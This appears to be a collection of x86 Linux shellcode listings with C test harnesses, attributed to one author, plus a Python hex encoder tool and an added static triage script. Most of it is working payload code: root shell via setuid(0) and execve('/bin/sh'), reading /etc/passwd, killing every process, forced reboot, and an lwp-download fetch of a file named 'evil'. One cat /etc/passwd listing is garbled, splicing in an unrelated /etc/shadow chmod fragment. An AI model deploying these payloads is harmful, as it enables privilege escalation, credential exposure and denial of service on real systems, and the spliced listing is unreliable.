fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
sethostname "pwned !!" x86 linux shellcode
/*
Title : sethostname "pwned !!"
Name : 32 bytes sys_sethostname("PwNeD !!",8) x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\xeb\x11" /* jmp 0x8048073 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x4a" /* mov $0x4a,%al */
"\x5b" /* pop %ebx */
"\xb1\x08" /* mov $0x8,%cl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xea\xff\xff\xff" /* call 0x8048062 */
"\x50" /* push %eax */
"\x77\x4e" /* ja 0x80480c9 */
"\x65" /* gs */
"\x44" /* inc %esp */
"\x20\x21" /* and %ah,(%ecx) */
"\x21"; /* .byte 0x21 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
/*
Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date : Tue Jun 1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\xeb\x19" /* jmp 0x804807b */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0b" /* mov $0xb,%al */
"\x5b" /* pop %ebx */
"\x89\xd1" /* mov %edx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe2\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68" /* jae 0x80480ef */
"";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
/bin/cat /etc/passwd 43 bytes x86 linux
/*
Title : /bin/cat /etc/passwd 43 bytes x86 linux
Name : 43 bytes sys_execve("/bin/cat","/etc/passwd") x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\xeb\x15" /* jmp 0x8048077 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0f" /* mov $0xf,%al */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\x66\xb9\xff\x01" /* mov $0x1ff,%cx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe6\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x65" /* gs */
"\x74\x63" /* je 0x80480e3 */
"\x2f" /* das */
"\x73\x68" /* jae 0x80480eb */
"\x61" /* popa */
"\x64\x6f" /* outsl %fs "(%esi),(%dx) */
"\x77" /* .byte 0x77 */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // mov $0xb,%al
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x61\x64\x6f\x77" // push dword 0x64777373
"\x68\x2f\x2f\x73\x68" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80"; // int 80h
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
ascii shellcode encoder decoder tool
#!/usr/bin/env python3
'''
This is ascii <-> shellcode encode / decoder tool
programmer : gunslinger_ <yudha.gunslinger[at]gmail.com>
This was written for educational purpose only. or fucking messing around...
i.e how to use encode mode :
--------------------------------------------------------------
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> encode
Please input data : /bin
shellcode => \x2f\x62\x69\x6e
gunslinger@localhost:~/shellcode$
--------------------------------------------------------------
i.e how to use decode mode :
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
we know 'x68' is push, so drop it...
"\x2f\x2f\x73\x68" $0x68732f2f
"\x2f\x62\x69\x6e" $0x6e69622f
--------------------------------------------------------------
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> decode
Please input data : \x2f\x2f\x73\x68
hex => 2f2f7368
plaintext => //sh
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> decode
Please input data : \x2f\x62\x69\x6e
hex => 2f62696e
plaintext => /bin
gunslinger@localhost:~/shellcode$
--------------------------------------------------------------
and we got that is "/bin//sh"
warning ! this is not disassemble tool !
'''
import binascii, sys, time

RED = '\033[31m'
WHITE = '\033[37m'
RESET = '\033[0;0m'

def main():
    print("shellcode hex encode decoder")
    print("programmer : gunslinger_ <yudha.gunslinger[at]gmail.com>")
    print("what do you want to do ? %sencode%s / %sdecode%s" % (RED, RESET, WHITE, RESET))
    q = input("=> ")
    if q == "encode":
        inputtype = input("Please input data : ")
        print("shellcode => ", end="")
        for byte in inputtype.encode("latin-1"):      # one \xHH escape per byte
            print("\\x%02x" % byte, end="")
            sys.stdout.flush()
            time.sleep(0.5)                           # slow "typing" effect, as in the original
        print(RESET)
    elif q == "decode":
        inputtype = input("Please input data : ")
        cleaninput = inputtype.replace("\\x", "")     # drop the \x prefixes, keep the hex digits
        print("hex => ", cleaninput)
        try:
            plaintext = binascii.unhexlify(cleaninput).decode("latin-1")
        except (binascii.Error, ValueError):
            print("input is not a valid \\xHH byte string")
            sys.exit(1)
        print("plaintext => ", plaintext)
    else:
        print("wrong answer ! your choice is %sencode%s or %sdecode%s" % (RED, RESET, WHITE, RESET))
        sys.exit(1)

if __name__ == '__main__':
    main()
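The decode walkthrough in the docstring above (drop the 0x68 push opcode, then read the pushed dwords back in reverse) can be automated for triage of a captured payload. The following is an added example, not part of the original tool or the author's posts: a linear sweep over just the opcode subset these listings use, which recovers the strings built by push immediates (or by a jmp/call/pop trailer) and reports the syscall number held in EAX at every `int 0x80`; the sample inputs are the page's own 10-byte killall and 43-byte cat /etc/passwd shellcodes, and any opcode outside that subset stops the sweep.

```python
"""Static triage of x86 Linux int 0x80 shellcode (added example): recover strings built
with push immediates or a jmp/call/pop trailer, and the syscall number in EAX at each
int 0x80.  Linear sweep over the opcode subset these listings use; not a disassembler."""
import struct
SYSCALL_NAMES = {1: "exit", 11: "execve", 36: "sync", 37: "kill",   # i386 numbers
                 39: "mkdir", 60: "umask", 88: "reboot"}            # used on this page

def triage(code: bytes) -> dict:
    strings, syscalls, run, eax, i = [], [], [], None, 0
    def flush():                       # a run of pushes ended: assemble the string;
        if run:                        # the last push sits lowest in memory, so reverse
            strings.append(b"".join(reversed(run)).rstrip(b"\0").decode("latin-1"))
            run.clear()
    while i < len(code):
        op = code[i]
        if op == 0x68:                                       # push imm32
            run.append(code[i+1:i+5]); i += 5; continue
        if op == 0x66 and code[i+1:i+2] == b"\x68":          # pushw imm16
            run.append(code[i+2:i+4]); i += 4; continue
        flush()
        if op == 0x6a and code[i+2:i+3] == b"\x58":          # push imm8; pop %eax
            eax = struct.unpack("<b", code[i+1:i+2])[0] & 0xffffffff; i += 3
        elif op in (0x6a, 0xeb, 0x31) or 0xb0 <= op <= 0xb7: # other 2-byte forms
            if op == 0x31 and code[i+1:i+2] == b"\xc0": eax = 0   # xor %eax,%eax
            if op == 0xb0:                                   # mov imm8,%al; upper bytes
                eax = ((eax or 0) & 0xffffff00) | code[i+1]  # assumed zero if unknown
            i += 2
        elif 0xb8 <= op <= 0xbf:                             # mov imm32,%r32
            if op == 0xb8: eax = struct.unpack("<I", code[i+1:i+5])[0]
            i += 5
        elif op == 0x89:                                     # mov %r32,%r32
            if code[i+1] & 0xc7 == 0xc0: eax = None          # destination is %eax
            i += 2
        elif 0x50 <= op <= 0x5f or op in (0x99, 0x40):       # push/pop reg, cltd, inc %eax
            eax = None if op == 0x58 or eax is None else eax + (op == 0x40)
            i += 1
        elif op == 0xe8:                                     # call rel32 backwards =
            rel = struct.unpack("<i", code[i+1:i+5])[0]      # jmp/call/pop: the bytes
            if rel < 0: strings.append(code[i+5:].split(b"\0")[0].decode("latin-1"))
            i = len(code) if rel < 0 else i + 5              # after it are the string
        elif op == 0xcd and code[i+1:i+2] == b"\x80":        # int 0x80
            syscalls.append((i, eax, SYSCALL_NAMES.get(eax, "?"))); i += 2
        else:                                                # outside the known subset
            return {"strings": strings, "syscalls": syscalls, "stopped_at": i}
    flush()
    return {"strings": strings, "syscalls": syscalls, "stopped_at": None}
# Sample inputs taken from two listings on this page: 10-byte killall, 43-byte cat /etc/passwd
KILLALL = bytes.fromhex("b0256aff5b6a0959cd80")
CAT_PASSWD = (b"\x31\xc0\xb0\x0b\x99\x52\x68/cat\x68/bin\x89\xe3\x52"
              b"\x68sswd\x68//pa\x68/etc\x89\xe1\x52\x51\x53\x89\xe1\xcd\x80")
```

`triage(CAT_PASSWD)` yields the two stack strings `/bin/cat` and `/etc//passwd` and a single `execve` at offset 41; `triage(KILLALL)` yields no strings and `kill` (37) at offset 8.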
kill all running process linux x86 shellcode
/*
Title : kill all running process
Name : 11 bytes sys_kill(-1,9) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : ubuntu linux
*/
#include <stdio.h>
#include <string.h>
char *killer=
	"\x31\xc0" /* xor %eax,%eax */
	"\xb0\x25" /* mov $0x25,%al  -> sys_kill */
	"\x6a\xff" /* push $0xffffffff */
	"\x5b" /* pop %ebx        -> pid = -1 */
	"\xb1\x09" /* mov $0x9,%cl   -> sig = SIGKILL */
	"\xcd\x80"; /* int $0x80 */
int main(void)
{
	fprintf(stdout,"Length: %d\n",(int)strlen(killer));
	((void (*)(void)) killer)();
	return 0;
}
45 bytes sys_execve(“/bin/sh”, “0″, “0″) with umask 16 (sys_umask(14)) x86 linux shellcode
/*
Name : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(void)
{
	/* sys_umask(0x0e), then jmp/call/pop into sys_execve("/bin/sh", 0, 0) */
	char shell[] = "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
	               "\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
	               "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
	               "\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
	               "\x2f\x62\x69\x6e\x2f\x73\x68";
	(*(void (*)()) shell)();
	return 0;
}
45 bytes sys_execve(“/bin/sh”, “-c”, “reboot”) x86 linux shellcode
/*
Name : 45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(void)
{
	char dark[] = "\x6a\x0b\x58\x99\x52\x68\x6f\x74\x20\x20\x68\x72\x65\x62\x6f"
	              "\x89\xe6\x52\x66\x68\x2d\x63\x89\xe1\x52\x68\x2f\x2f\x73\x68"
	              "\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80";
	void (*door)(void) = (void (*)(void)) dark;
	door();
	return 0;
}
55 bytes sys_execve(“/bin/sh”, “-c”, “ping localhost”) x86 linux shellcode
/*
Name : 55 bytes sys_execve("/bin/sh", "-c", "ping localhost") x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
char asshole[] = "\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x73\x74\x20\x20" // push $0x20207473
"\x68\x61\x6c\x68\x6f" // push $0x6f686c61
"\x68\x20\x6c\x6f\x63" // push $0x636f6c20
"\x68\x70\x69\x6e\x67" // push $0x676e6970
"\x89\xe6" // mov %esp,%esi
"\x52" // push %edx
"\x66\x68\x2d\x63" // pushw $0x632d
"\x89\xe1" // mov %esp,%ecx
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x56" // push %esi
"\x51" // push %ecx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80"; // int $0x80
int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) asshole;
	(*func)();
	return 0;
}
52 bytes sys_execve(“/usr/bin/lwp-download”, “evil”) x86 linux shellcode
/*
Name : 52 bytes sys_execve("/usr/bin/lwp-download", "evil") x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
char getter[] = "\x6a\x0b\x58\x99\x52\x68"
"\x65\x76\x69\x6c" // evil
"\x89\xe1\x52\x6a\x64\x68"
"\x6e\x6c\x6f\x61\x68\x2d"
"\x64\x6f\x77\x68\x2f\x6c"
"\x77\x70\x68\x2f\x62\x69"
"\x6e\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53\x89"
"\xe1\xcd\x80\x40\xcd\x80";
int main(void)
{
	(*(void(*)()) getter)();
	return 0;
}
38 bytes sys_mkdir(“/tmp/dir”,1) x86 linux shellcode
/*
Name : 38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
/*
gunslinger@localhost:~/shellcode$ objdump -d mkdir
mkdir: file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
8048060: eb 17 jmp 0x8048079
8048062: 31 c0 xor %eax,%eax
8048064: 31 db xor %ebx,%ebx
8048066: 31 d2 xor %edx,%edx
8048068: 31 c9 xor %ecx,%ecx
804806a: b0 27 mov $0x27,%al
804806c: 5b pop %ebx
804806d: b1 00 mov $0x0,%cl
804806f: cd 80 int $0x80
8048071: 31 c0 xor %eax,%eax
8048073: b0 01 mov $0x1,%al
8048075: 31 db xor %ebx,%ebx
8048077: cd 80 int $0x80
8048079: e8 e4 ff ff ff call 0x8048062
804807e: 2f das
804807f: 74 6d je 0x80480ee
8048081: 70 2f jo 0x80480b2
8048083: 64 fs
8048084: 69 .byte 0x69
8048085: 72 .byte 0x72
gunslinger@localhost:~/shellcode$
*/
#include <stdio.h>
char shellcodedir[] = "\xeb\x17"
"\x31\xc0"
"\x31\xdb"
"\x31\xd2"
"\x31\xc9"
"\xb0\x27"
"\x5b"
"\xb1\x01"
"\xcd\x80"
"\x31\xc0"
"\xb0\x01"
"\x31\xdb"
"\xcd\x80"
"\xe8\xe4\xff\xff\xff"
"\x2f"
"\x74\x6d"
"\x70\x2f"
"\x64"
"\x69"
"\x72";
int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) shellcodedir;
	(*func)();
	return 0;
}
/bin/cat /etc/passwd 43 bytes x86 linux
/*
Title : /bin/cat /etc/passwd 43 bytes x86 linux
Name : 43 bytes sys_execve("/bin/cat","/etc/passwd") x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
#include <string.h>
char *shellcode=
	"\x31\xc0" // xorl %eax,%eax
	"\xb0\x0b" // mov $0xb,%al  -> sys_execve
	"\x99" // cdq
	"\x52" // push edx
	"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
	"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
	"\x89\xe3" // mov ebx,esp
	"\x52" // push edx
	"\x68\x73\x73\x77\x64" // push dword 0x64777373
	"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
	"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
	"\x89\xe1" // mov ecx,esp
	"\x52" // push edx
	"\x51" // push ecx
	"\x53" // push ebx
	"\x89\xe1" // mov ecx,esp
	"\xcd\x80"; // int 80h
int main()
{
	fprintf(stdout,"Length: %d\n",(int)strlen(shellcode));
	(*(void (*)()) shellcode)();
	return 0;
}
/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
33 bytes hard / unclean reboot but data not be lost x86 linux shellcode
/*
Title : hard reboot (without any message) and data not lost shellcode
Name : 33 bytes hard / unclean reboot but data not be lost x86 linux shellcode
Date : Thu Jun 3 12:54:55 2010
Author : gunslinger_
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux ubuntu 9.04 , may cause fsck on reboot
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include <stdio.h>
#include <string.h>
char *shellcode=
	"\xb0\x24" /* mov $0x24,%al  -> sys_sync */
	"\xcd\x80" /* int $0x80 */
	"\x31\xc0" /* xor %eax,%eax */
	"\xb0\x58" /* mov $0x58,%al  -> sys_reboot */
	"\xbb\xad\xde\xe1\xfe" /* mov $0xfee1dead,%ebx */
	"\xb9\x69\x19\x12\x28" /* mov $0x28121969,%ecx */
	"\xba\x67\x45\x23\x01" /* mov $0x1234567,%edx */
	"\xcd\x80" /* int $0x80 */
	"\x31\xc0" /* xor %eax,%eax */
	"\xb0\x01" /* mov $0x1,%al   -> sys_exit */
	"\x31\xdb" /* xor %ebx,%ebx */
	"\xcd\x80"; /* int $0x80 */
int main(void)
{
	fprintf(stdout,"Length: %d\n",(int)strlen(shellcode));
	((void (*)(void)) shellcode)();
	return 0;
}
10 bytes killall x86 linux shellcode
/*
Name : 10 bytes killall x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
/*
section .text
global _start
_start:
mov al, 37
push byte -1
pop ebx
push byte 9
pop ecx
int 0x80
*/
char killme[]=
"\xb0\x25" /* mov $0x25,%al */
"\x6a\xff" /* push $0xffffffff */
"\x5b" /* pop %ebx */
"\x6a\x09" /* push $0x9 */
"\x59" /* pop %ecx */
"\xcd\x80"; /* int $0x80 */
/* end of shellcode - shgen by andreas n. */
int main(void)
{
	(*(void(*)()) killme)();
	return 0;
}